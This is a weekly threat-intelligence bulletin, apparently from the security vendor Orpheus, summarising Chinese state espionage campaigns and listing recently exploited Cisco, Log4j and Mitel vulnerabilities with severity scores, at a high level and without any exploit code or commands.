The reporting this week focuses on widespread campaigns conducted by a Chinese espionage group which demonstrate China’s capabilities and continued interest in state-level political and military intelligence collection. Threat actors ToddyCat initially targeted Taiwan and Vietnamese government and military targets before expanding its campaign to include victims in Iran, India, Russia, and the United Kingdom, and then later Indonesia, Uzbekistan, and Kyrgyzstan.

The group leveraged the popular ProxyLogon vulnerabilities to compromise Microsoft Exchange servers and then deployed previously unseen espionage tools: the Samurai backdoor and Ninja Trojan. We have recently reported on Chinese nation-state groups GALLIUM and Aoqin Dragon conducting widespread espionage campaigns, and this latest incident reaffirms Beijing’s intent and capability to conduct pervasive intelligence collection operations against European and Asian targets.

Key Vulnerabilities

  1. CVE-2022-20664
    A vulnerability in the web management interface of Cisco Secure Email and Web Manager (CVSS: 7.7| OVSS: 21) can allow a remote user to obtain sensitive information which includes user credentials from the external authentication server. However, exploitation of this vulnerability is reliant upon possessing valid operator-level (or higher) credentials.
  2. CVE-2021-44228
    The notorious Apache Log4j vulnerability (CVSS: 10| OVSS:100) continues to be leveraged by threat actors despite its discovery in December 2021, allowing users that control log messages and its parameters to execute arbitrary code. On this occasion, AvosLocker ransomware group affiliates used the vulnerability to compromise a susceptible a VMware Horizon server.
  3. CVE-2022-29499
    A vulnerability caused by incorrect data validation in the Service Appliance component within Mitel MiVoice Connect through 19.2 SP3 (CVSS: 9.8| OVSS:39) can allow a user to conduct remote code execution. Reports online suggest that ransomware groups are exploiting this vulnerability to gain initial access to victim’s networks.

Key Intelligence Reports

  1. Newly identified Chinese state unit ToddyCat exploits Microsoft Exchange servers to deliver custom espionage tools.
    Since December 2020, the newly identified state unit ToddyCat has targeted high-profile government and military entities in Europe and Asia to deliver two previously undocumented espionage tools: the Samurai backdoor and Ninja Trojan.
    Read full report >>
  2. Chinese espionage unit Tropic Trooper targets novice threat actors with infostealer and backdoor.
    For several years, the Chinese espionage unit Tropic Trooper has targeted script kiddies to deploy a novel loader labelled Nimbda and a new variant of the Yahoyah trojan. Read full report >>
  3. AvosLocker ransomware group exploits Log4Shell to compromise VMware Horizon servers.
    Affiliates of the AvosLocker ransomware-as-a-service gang have exploited a VMware Horizon server vulnerable to Log4Shell to deploy its payload. Read full report >>

What is OVSS?

The Orpheus Vulnerability Severity Score (OVSS) helps companies understand the risk associated with particular vulnerabilities. Orpheus does this by adding additional context on the likely threat to and impact of CVEs, building upon the vulnerability information that is provided as part of the CVSS (Common Vulnerabilities Scoring System) score.

The Orpheus Vulnerability Severity Score (OVSS)